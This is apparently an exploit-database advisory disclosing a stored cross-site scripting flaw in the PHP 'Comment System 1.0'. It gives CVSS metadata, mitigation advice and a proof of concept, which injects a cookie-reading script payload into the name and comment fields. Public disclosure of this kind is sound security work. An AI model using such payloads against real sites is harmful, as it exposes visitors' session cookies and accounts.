Comment System 1.0 - 'multiple' Stored Cross-Site Scripting

vendor:

Comment System 1.0

by:

Pintu Solanki

8.8

CVSS

HIGH

Stored Cross-Site Scripting

CWE

Product Name: Comment System 1.0

Affected Version From: Comment System 1.0

Affected Version To: Comment System 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:comment_system_1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

2021

Comment System 1.0 – ‘multiple’ Stored Cross-Site Scripting

Comment System 1.0 is vulnerable to Stored Cross-Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the 'Your Name' and 'Comment' fields of the comment form. When a user visits the page, the malicious code will be executed in the user's browser.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the database. Additionally, output encoding should be used to prevent malicious code from being executed in the user's browser.

Source

Exploit-DB raw data:

# Exploit Title: Comment System 1.0 - 'multiple' Stored Cross-Site Scripting
# Date: 2021-02-18
# Exploit Author: Pintu Solanki
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14713/comment-system-phpmysqli-full-source-code.html
# Software: : Comment System 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4


# Vulnerable Page: http://localhost/comment/index.php
# Vulnerable Input Field :

Your Name:  "><script>alert(document.cookie)</script>

Comment:    "><script>alert(document.cookie)</script>

# Payload used:

"><script>alert(document.cookie)</script>

# POC: Whenever we will go to the page (http://localhost/comment/index.php) where the script is injected, the stored script will be executed.
# You will see your Javascript code (XSS) executed.